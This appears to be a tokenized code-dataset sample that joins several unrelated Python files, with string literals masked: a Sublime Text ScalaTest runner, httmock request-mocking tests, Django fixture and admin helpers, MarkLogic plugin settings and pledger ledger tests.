<EOL> def relative_path_to_class_name ( self , partition_folder , relative_path , suffix ) : <EOL> return relative_path . rpartition ( partition_folder + "<STR_LIT:/>" ) [ <NUM_LIT:2> ] . replace ( "<STR_LIT:/>" , "<STR_LIT:.>" ) . replace ( suffix , "<STR_LIT>" ) <EOL> def read_stdout ( self ) : <EOL> self . copy_stream_to_output_view ( self . proc . stdout ) <EOL> def read_stderr ( self ) : <EOL> self . copy_stream_to_output_view ( self . proc . stderr ) <EOL> def copy_stream_to_output_view ( self , stream ) : <EOL> while True : <EOL> data = os . read ( stream . fileno ( ) , <NUM_LIT:2> ** <NUM_LIT:15> ) <EOL> if data != "<STR_LIT>" : <EOL> sublime . set_timeout ( functools . partial ( self . append_data , self . proc , data ) , <NUM_LIT:0> ) <EOL> else : <EOL> stream . close ( ) <EOL> break <EOL> def window ( self ) : <EOL> return self . view . window ( ) <EOL> def append_data ( self , proc , data ) : <EOL> self . output_view . set_read_only ( False ) <EOL> edit = self . output_view . begin_edit ( ) <EOL> self . output_view . insert ( edit , self . output_view . size ( ) , data ) <EOL> self . output_view . end_edit ( edit ) <EOL> self . output_view . set_read_only ( True ) <EOL> def show_tests_panel ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . output_view = self . window ( ) . get_output_panel ( "<STR_LIT>" ) <EOL> self . clear_test_view ( ) <EOL> self . window ( ) . run_command ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> def clear_test_view ( self ) : <EOL> self . output_view . set_read_only ( False ) <EOL> edit = self . output_view . begin_edit ( ) <EOL> self . output_view . erase ( edit , sublime . Region ( <NUM_LIT:0> , self . output_view . size ( ) ) ) <EOL> self . output_view . end_edit ( edit ) <EOL> self . output_view . set_read_only ( True ) <EOL> class ScalaTestCommand ( BaseScalaTestCommand ) : <EOL> def junit_args ( self ) : <EOL> return self . relative_path_to_class_name ( "<STR_LIT>" , self . view . file_name ( ) , "<STR_LIT>" ) <EOL> class ScalaTestAllCommand ( BaseScalaTestCommand ) : <EOL> def junit_args ( self ) : <EOL> matches = [ ] <EOL> for root , dirnames , filenames in os . walk ( self . base_dir + '<STR_LIT>' ) : <EOL> for filename in fnmatch . filter ( filenames , '<STR_LIT>' ) : <EOL> matches . append ( self . relative_path_to_class_name ( "<STR_LIT>" , os . path . join ( root , filename ) , "<STR_LIT>" ) ) <EOL> test_classes = "<STR_LIT:U+0020>" . join ( matches ) <EOL> return test_classes <EOL> class JumpToScalaFile ( sublime_plugin . TextCommand ) : <EOL> def run ( self , edit ) : <EOL> self . base_dir = self . view . file_name ( ) . partition ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> self . files = [ ] <EOL> for root , dirnames , filenames in os . walk ( self . base_dir ) : <EOL> for filename in fnmatch . filter ( filenames , '<STR_LIT>' ) : <EOL> self . files . append ( os . path . join ( root , filename ) ) <EOL> file_names = map ( lambda x : os . path . split ( x ) [ <NUM_LIT:1> ] , self . files ) <EOL> sublime . active_window ( ) . show_quick_panel ( file_names , self . file_selected ) <EOL> def file_selected ( self , selected_index ) : <EOL> if selected_index != - <NUM_LIT:1> : <EOL> sublime . active_window ( ) . open_file ( self . files [ selected_index ] ) <EOL> def wrap_in_cd ( path , command ) : <EOL> return '<STR_LIT>' + path . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) + '<STR_LIT>' + command </s>
<s> import requests <EOL> import sys <EOL> import unittest <EOL> from httmock import ( all_requests , response , urlmatch , with_httmock , HTTMock , <EOL> text_type , binary_type ) <EOL> @ urlmatch ( scheme = '<STR_LIT>' ) <EOL> def unmatched_scheme ( url , request ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> @ urlmatch ( path = r'<STR_LIT>' ) <EOL> def unmatched_path ( url , request ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> @ urlmatch ( method = '<STR_LIT>' ) <EOL> def unmatched_method ( url , request ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> @ urlmatch ( netloc = r'<STR_LIT>' , path = r'<STR_LIT>' ) <EOL> def google_mock ( url , request ) : <EOL> return '<STR_LIT>' <EOL> @ urlmatch ( scheme = '<STR_LIT:http>' , netloc = r'<STR_LIT>' ) <EOL> def facebook_mock ( url , request ) : <EOL> return '<STR_LIT>' <EOL> def any_mock ( url , request ) : <EOL> return '<STR_LIT>' % ( url . netloc , ) <EOL> def dict_any_mock ( url , request ) : <EOL> return { <EOL> '<STR_LIT:content>' : '<STR_LIT>' % ( url . netloc , ) , <EOL> '<STR_LIT>' : <NUM_LIT:200> <EOL> } <EOL> def example_400_response ( url , response ) : <EOL> r = requests . Response ( ) <EOL> r . status_code = <NUM_LIT> <EOL> r . _content = b'<STR_LIT>' <EOL> return r <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_return_type ( self ) : <EOL> with HTTMock ( any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( r , requests . Response ) ) <EOL> self . assertTrue ( isinstance ( r . content , binary_type ) ) <EOL> self . assertTrue ( isinstance ( r . text , text_type ) ) <EOL> def test_scheme_fallback ( self ) : <EOL> with HTTMock ( unmatched_scheme , any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_path_fallback ( self ) : <EOL> with HTTMock ( unmatched_path , any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_method_fallback ( self ) : <EOL> with HTTMock ( unmatched_method , any_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_netloc_fallback ( self ) : <EOL> with HTTMock ( google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> with HTTMock ( google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_400_response ( self ) : <EOL> with HTTMock ( example_400_response ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_real_request_fallback ( self ) : <EOL> with HTTMock ( any_mock ) : <EOL> with HTTMock ( google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_invalid_intercept_response_raises_value_error ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return - <NUM_LIT:1> <EOL> with HTTMock ( response_content ) : <EOL> self . assertRaises ( TypeError , requests . get , '<STR_LIT>' ) <EOL> class DecoratorTest ( unittest . TestCase ) : <EOL> @ with_httmock ( any_mock ) <EOL> def test_decorator ( self ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> @ with_httmock ( any_mock ) <EOL> def test_iter_lines ( self ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( list ( r . iter_lines ( ) ) , <EOL> [ b'<STR_LIT>' ] ) <EOL> class AllRequestsDecoratorTest ( unittest . TestCase ) : <EOL> def test_all_requests_response ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT:content>' : '<STR_LIT>' } <EOL> with HTTMock ( response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_all_str_response ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return '<STR_LIT>' <EOL> with HTTMock ( response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> class AllRequestsMethodDecoratorTest ( unittest . TestCase ) : <EOL> @ all_requests <EOL> def response_content ( self , url , request ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:200> , '<STR_LIT:content>' : '<STR_LIT>' } <EOL> def test_all_requests_response ( self ) : <EOL> with HTTMock ( self . response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> @ all_requests <EOL> def string_response_content ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> def test_all_str_response ( self ) : <EOL> with HTTMock ( self . string_response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> class UrlMatchMethodDecoratorTest ( unittest . TestCase ) : <EOL> @ urlmatch ( netloc = r'<STR_LIT>' , path = r'<STR_LIT>' ) <EOL> def google_mock ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> @ urlmatch ( scheme = '<STR_LIT:http>' , netloc = r'<STR_LIT>' ) <EOL> def facebook_mock ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> @ urlmatch ( query = r'<STR_LIT>' ) <EOL> def query_page_mock ( self , url , request ) : <EOL> return '<STR_LIT>' <EOL> def test_netloc_fallback ( self ) : <EOL> with HTTMock ( self . google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> with HTTMock ( self . google_mock , facebook_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> def test_query ( self ) : <EOL> with HTTMock ( self . query_page_mock , self . google_mock ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> r2 = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . content , b'<STR_LIT>' ) <EOL> self . assertEqual ( r2 . content , b'<STR_LIT>' ) <EOL> class ResponseTest ( unittest . TestCase ) : <EOL> content = { '<STR_LIT:name>' : '<STR_LIT:foo>' , '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } <EOL> content_list = list ( content . keys ( ) ) <EOL> def test_response_auto_json ( self ) : <EOL> r = response ( <NUM_LIT:0> , self . content ) <EOL> self . assertTrue ( isinstance ( r . content , binary_type ) ) <EOL> self . assertTrue ( isinstance ( r . text , text_type ) ) <EOL> self . assertEqual ( r . json ( ) , self . content ) <EOL> r = response ( <NUM_LIT:0> , self . content_list ) <EOL> self . assertEqual ( r . json ( ) , self . content_list ) <EOL> def test_response_status_code ( self ) : <EOL> r = response ( <NUM_LIT:200> ) <EOL> self . assertEqual ( r . status_code , <NUM_LIT:200> ) <EOL> def test_response_headers ( self ) : <EOL> r = response ( <NUM_LIT:200> , None , { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } ) <EOL> self . assertEqual ( r . headers [ '<STR_LIT>' ] , '<STR_LIT:application/json>' ) <EOL> def test_response_cookies ( self ) : <EOL> @ all_requests <EOL> def response_content ( url , request ) : <EOL> return response ( <NUM_LIT:200> , '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } , <EOL> request = request ) <EOL> with HTTMock ( response_content ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( r . cookies ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in r . cookies ) <EOL> self . assertEqual ( r . cookies [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> def test_python_version_encoding_differences ( self ) : <EOL> @ all_requests <EOL> def get_mock ( url , request ) : <EOL> return { '<STR_LIT:content>' : self . content , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:application/json>' } , <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : <NUM_LIT:5> } <EOL> with HTTMock ( get_mock ) : <EOL> response = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . content , response . json ( ) ) <EOL> def test_mock_redirect ( self ) : <EOL> @ urlmatch ( netloc = '<STR_LIT>' ) <EOL> def get_mock ( url , request ) : <EOL> return { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> with HTTMock ( get_mock , google_mock ) : <EOL> response = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( response . history ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( response . content , b'<STR_LIT>' ) <EOL> class StreamTest ( unittest . TestCase ) : <EOL> @ with_httmock ( any_mock ) <EOL> def test_stream_request ( self ) : <EOL> r = requests . get ( '<STR_LIT>' , stream = True ) <EOL> self . assertEqual ( r . raw . read ( ) , b'<STR_LIT>' ) <EOL> @ with_httmock ( dict_any_mock ) <EOL> def test_stream_request_with_dict_mock ( self ) : <EOL> r = requests . get ( '<STR_LIT>' , stream = True ) <EOL> self . assertEqual ( r . raw . read ( ) , b'<STR_LIT>' ) <EOL> @ with_httmock ( any_mock ) <EOL> def test_non_stream_request ( self ) : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( r . raw . read ( ) , b'<STR_LIT>' ) </s>
<s> from django . db import models <EOL> from datetime import datetime , date <EOL> from decimal import Decimal <EOL> import six <EOL> from six . moves import xrange <EOL> from django_dynamic_fixture . django_helper import django_greater_than <EOL> class DataFixtureTestCase ( object ) : <EOL> def setUp ( self ) : <EOL> self . fixture = None <EOL> def test_numbers ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . IntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . SmallIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . PositiveIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . PositiveSmallIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . BigIntegerField ( ) ) , int ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . FloatField ( ) ) , float ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DecimalField ( max_digits = <NUM_LIT:1> , decimal_places = <NUM_LIT:1> ) ) , Decimal ) ) <EOL> def test_it_must_deal_with_decimal_max_digits ( self ) : <EOL> for _ in xrange ( <NUM_LIT:11> ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DecimalField ( max_digits = <NUM_LIT:1> , decimal_places = <NUM_LIT:1> ) ) , Decimal ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DecimalField ( max_digits = <NUM_LIT:2> , decimal_places = <NUM_LIT:1> ) ) , Decimal ) ) <EOL> def test_strings ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . CharField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . TextField ( ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . SlugField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . CommaSeparatedIntegerField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> def test_new_truncate_strings_to_max_length ( self ) : <EOL> for _ in range ( <NUM_LIT:12> ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . CharField ( max_length = <NUM_LIT:1> ) ) , six . text_type ) ) <EOL> def test_boolean ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . BooleanField ( ) ) , bool ) ) <EOL> value = self . fixture . generate_data ( models . NullBooleanField ( ) ) <EOL> self . assertTrue ( isinstance ( value , bool ) or value == None ) <EOL> def test_date_time_related ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DateField ( ) ) , date ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . TimeField ( ) ) , datetime ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . DateTimeField ( ) ) , datetime ) ) <EOL> def test_formatted_strings ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . EmailField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . URLField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . IPAddressField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> if django_greater_than ( '<STR_LIT>' ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . GenericIPAddressField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> def test_files ( self ) : <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . FilePathField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . FileField ( ) ) , six . text_type ) ) <EOL> try : <EOL> import pil <EOL> self . assertTrue ( isinstance ( self . fixture . generate_data ( models . ImageField ( max_length = <NUM_LIT:100> ) ) , six . text_type ) ) <EOL> except ImportError : <EOL> pass </s>
<s> import six <EOL> from django . contrib import admin <EOL> from django . contrib . admin . sites import AlreadyRegistered <EOL> from django . core . urlresolvers import reverse <EOL> from django . db . models import * <EOL> from . django_helper import * <EOL> ADMIN_FIELDS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def create_admin_inline_class ( model , inline_class = admin . TabularInline ) : <EOL> """<STR_LIT>""" <EOL> attrs = { } <EOL> attrs [ '<STR_LIT>' ] = model <EOL> return type ( get_model_name ( model ) + '<STR_LIT>' , ( inline_class , ) , attrs ) <EOL> def create_admin_class ( model , ** kwargs ) : <EOL> model_admin_class = type ( get_model_name ( model ) + '<STR_LIT>' , ( admin . ModelAdmin , ) , kwargs ) <EOL> return model_admin_class <EOL> def register_admin_class ( model , admin_class , override = False ) : <EOL> try : <EOL> admin . site . register ( model , admin_class ) <EOL> return admin_class <EOL> except AlreadyRegistered : <EOL> if override : <EOL> admin . site . unregister ( model ) <EOL> admin . site . register ( model , admin_class ) <EOL> return admin_class <EOL> else : <EOL> return get_registered_admin ( model ) <EOL> def get_registered_admin ( model ) : <EOL> return admin . site . _registry [ model ] . __class__ <EOL> def get_admin_change_link ( model , obj_id ) : <EOL> app_label = model . _meta . app_label <EOL> model_name = get_model_name ( model ) <EOL> name = '<STR_LIT>' % ( model_name , obj_id ) <EOL> reverse_url = '<STR_LIT>' % ( app_label . lower ( ) , model_name . lower ( ) ) <EOL> url = reverse ( reverse_url , args = ( obj_id , ) ) <EOL> try : <EOL> from django . utils . html import format_html <EOL> except ImportError : <EOL> from django . utils . safestring import mark_safe <EOL> def conditional_escape ( text ) : <EOL> if isinstance ( text , SafeData ) : <EOL> return text <EOL> else : <EOL> return escape ( text ) <EOL> def format_html ( format_string , * args , ** kwargs ) : <EOL> args_safe = map ( conditional_escape , args ) <EOL> kwargs_safe = dict ( [ ( k , conditional_escape ( v ) ) for ( k , v ) in six . iteritems ( kwargs ) ] ) <EOL> return mark_safe ( format_string . format ( * args_safe , ** kwargs_safe ) ) <EOL> return format_html ( '<STR_LIT>' % ( url , name ) ) <EOL> def print_model_admin ( admin_class ) : <EOL> for field in ADMIN_FIELDS : <EOL> value = admin_class . __dict__ . get ( field , None ) <EOL> if value : <EOL> print ( '<STR_LIT>' % ( field , value ) ) </s>
<s> VERSION = '<STR_LIT>' </s>
<s> import sublime <EOL> import os <EOL> import re <EOL> import glob <EOL> from . ml_options import MlOptions <EOL> from . roxy_options import RoxyOptions <EOL> SETTINGS_FILE = "<STR_LIT>" <EOL> class MlSettings : <EOL> _stored_search_paths = None <EOL> _search_paths = None <EOL> _sublime_options = None <EOL> @ staticmethod <EOL> def merge_dicts ( dict1 , dict2 ) : <EOL> for key in dict2 : <EOL> value = dict2 [ key ] <EOL> if ( ( key in dict1 ) and isinstance ( value , dict ) ) : <EOL> MlSettings . merge_dicts ( dict1 [ key ] , value ) <EOL> else : <EOL> dict1 [ key ] = value <EOL> @ staticmethod <EOL> def settings ( ) : <EOL> if ( not MlSettings . _sublime_options ) : <EOL> default_file = os . path . join ( "<STR_LIT>" , "<STR_LIT>" , SETTINGS_FILE ) <EOL> user_file = os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" , SETTINGS_FILE ) <EOL> default_options = MlOptions ( default_file ) <EOL> MlSettings . _sublime_options = default_options . options . copy ( ) <EOL> if ( os . path . exists ( user_file ) ) : <EOL> user_options = MlOptions ( user_file ) <EOL> MlSettings . merge_dicts ( MlSettings . _sublime_options , user_options . options ) <EOL> return MlSettings . _sublime_options <EOL> def write_settings_sub_pref ( self , key , sub_key , value ) : <EOL> user_file = os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" , SETTINGS_FILE ) <EOL> user_options = MlOptions ( user_file ) <EOL> user_options . set_sub_pref ( key , sub_key , value ) <EOL> def __init__ ( self ) : <EOL> self . _roxy_options = None <EOL> self . _proj_options = None <EOL> def get_search_paths ( self ) : <EOL> stored_search_paths = self . get_xcc_pref ( "<STR_LIT>" ) <EOL> if ( not stored_search_paths ) : <EOL> return None <EOL> if ( not isinstance ( stored_search_paths , list ) ) : <EOL> stored_search_paths = [ stored_search_paths ] <EOL> if ( stored_search_paths != MlSettings . _stored_search_paths ) : <EOL> MlSettings . _stored_search_paths = stored_search_paths <EOL> resolved_search_paths = [ ] <EOL> for search_path in stored_search_paths : <EOL> if os . path . exists ( search_path ) : <EOL> resolved_search_paths . append ( search_path ) <EOL> else : <EOL> current_options_file = self . get_current_options_file ( ) <EOL> if ( re . match ( SETTINGS_FILE , current_options_file ) == None ) : <EOL> root_folder = os . path . dirname ( current_options_file ) <EOL> for found_path in glob . glob ( os . path . join ( root_folder , search_path ) ) : <EOL> resolved_search_paths . append ( found_path ) <EOL> MlSettings . _search_paths = resolved_search_paths <EOL> return MlSettings . _search_paths <EOL> def projectOptions ( self ) : <EOL> if not self . _proj_options : <EOL> self . _proj_options = MlOptions ( ) <EOL> return self . _proj_options <EOL> def roxyOptions ( self ) : <EOL> if not self . _roxy_options : <EOL> self . _roxy_options = RoxyOptions ( self . roxy_env ( ) ) <EOL> return self . _roxy_options <EOL> def roxy_env ( self ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) or "<STR_LIT>" <EOL> def use_roxy ( self ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> def get_pref ( self , key ) : <EOL> if self . projectOptions ( ) . has_key ( key ) : <EOL> return self . projectOptions ( ) . get ( key ) <EOL> elif ( self . use_roxy ( ) == True and self . roxyOptions ( ) . has_key ( key ) ) : <EOL> return self . roxyOptions ( ) . get ( key ) <EOL> return self . settings ( ) . get ( key ) <EOL> def get_sub_pref ( self , key , sub_key ) : <EOL> if self . projectOptions ( ) . has_subkey ( key , sub_key ) : <EOL> return self . projectOptions ( ) . get_sub_pref ( key , sub_key ) <EOL> if ( self . use_roxy ( ) == True and self . roxyOptions ( ) . has_key ( sub_key ) ) : <EOL> return self . roxyOptions ( ) . get ( sub_key ) <EOL> return self . settings ( ) . get ( key ) . get ( sub_key ) <EOL> def set_sub_pref ( self , key , sub_key , value ) : <EOL> if self . projectOptions ( ) . has_key ( key ) : <EOL> self . projectOptions ( ) . set_sub_pref ( key , sub_key , value ) <EOL> elif ( self . use_roxy ( ) == True and self . roxyOptions ( ) . has_key ( key ) ) : <EOL> return <EOL> else : <EOL> o = self . settings ( ) . get ( key ) <EOL> o [ sub_key ] = value <EOL> self . settings ( ) [ key ] = o <EOL> self . write_settings_sub_pref ( key , sub_key , value ) <EOL> def get_xcc_pref ( self , key ) : <EOL> return self . get_sub_pref ( "<STR_LIT>" , key ) <EOL> def set_xcc_pref ( self , key , value ) : <EOL> self . set_sub_pref ( "<STR_LIT>" , key , value ) <EOL> def set_content_db ( self , name ) : <EOL> self . set_xcc_pref ( "<STR_LIT>" , name ) <EOL> def set_modules_db ( self , name ) : <EOL> self . set_xcc_pref ( "<STR_LIT>" , name ) <EOL> def set_lint_on_save ( self , value ) : <EOL> self . set_sub_pref ( "<STR_LIT>" , "<STR_LIT>" , value ) <EOL> def get_current_options_file ( self ) : <EOL> options_file = self . projectOptions ( ) . options_file ( ) <EOL> if options_file : <EOL> return options_file <EOL> if ( self . use_roxy ( ) ) : <EOL> options_file = self . roxyOptions ( ) . options_file ( ) <EOL> if options_file : <EOL> return options_file <EOL> return os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" , SETTINGS_FILE ) <EOL> @ staticmethod <EOL> def debug ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_scroll_to_error ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_highlight_selected_regions ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_on_edit ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_on_edit_timeout ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def lint_on_save ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def lint_on_load ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True <EOL> @ staticmethod <EOL> def enable_marklogic_functions ( ) : <EOL> return MlSettings . settings ( ) . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) == True </s>
<s> from support . group import Group </s>
<s> from pledger . transaction import Transaction <EOL> from pledger . ledger_processor import LedgerProcessor <EOL> import itertools <EOL> import os . path <EOL> class Ledger ( object ) : <EOL> def __init__ ( self , filename , transactions , parser ) : <EOL> self . filename = filename <EOL> self . transactions = transactions <EOL> self . parser = parser <EOL> def absolute_filename ( self , filename ) : <EOL> if os . path . isabs ( filename ) : return filename <EOL> dir = os . path . dirname ( self . filename ) <EOL> return os . path . join ( dir , filename ) </s>
<s> import unittest <EOL> from decimal import Decimal , InvalidOperation <EOL> from pledger . value import Value , ZERO <EOL> class SingleCurrency ( unittest . TestCase ) : <EOL> def testSumNull ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( <NUM_LIT:32> ) } ) <EOL> self . assertEqual ( value , value + ZERO ) <EOL> def testParsing ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( value , Value . parse ( "<STR_LIT>" ) ) <EOL> def testParseNoCurrency ( self ) : <EOL> self . assertRaises ( InvalidOperation , Value . parse ( "<STR_LIT>" ) ) <EOL> def testParseInvalidDecimal ( self ) : <EOL> self . assertRaises ( ValueError , Value . parse ( "<STR_LIT>" ) ) <EOL> def testCurrencies ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( [ "<STR_LIT>" ] , list ( value . currencies ( ) ) ) <EOL> def testComponents ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( [ value ] , list ( value . components ( ) ) ) <EOL> self . assertEqual ( [ value ] , list ( value . components ( [ "<STR_LIT>" ] ) ) ) <EOL> self . assertEqual ( [ ZERO ] , list ( value . components ( [ "<STR_LIT>" ] ) ) ) <EOL> self . assertEqual ( [ ZERO ] , list ( value . components ( [ ] ) ) ) <EOL> def testNeg ( self ) : <EOL> amount = Decimal ( "<STR_LIT>" ) <EOL> value = Value ( { "<STR_LIT>" : amount } ) <EOL> self . assertEqual ( Value ( { "<STR_LIT>" : - amount } ) , - value ) <EOL> def testNegative ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertFalse ( value . negative ( ) ) <EOL> self . assertTrue ( ( - value ) . negative ( ) ) <EOL> def testEquality ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" 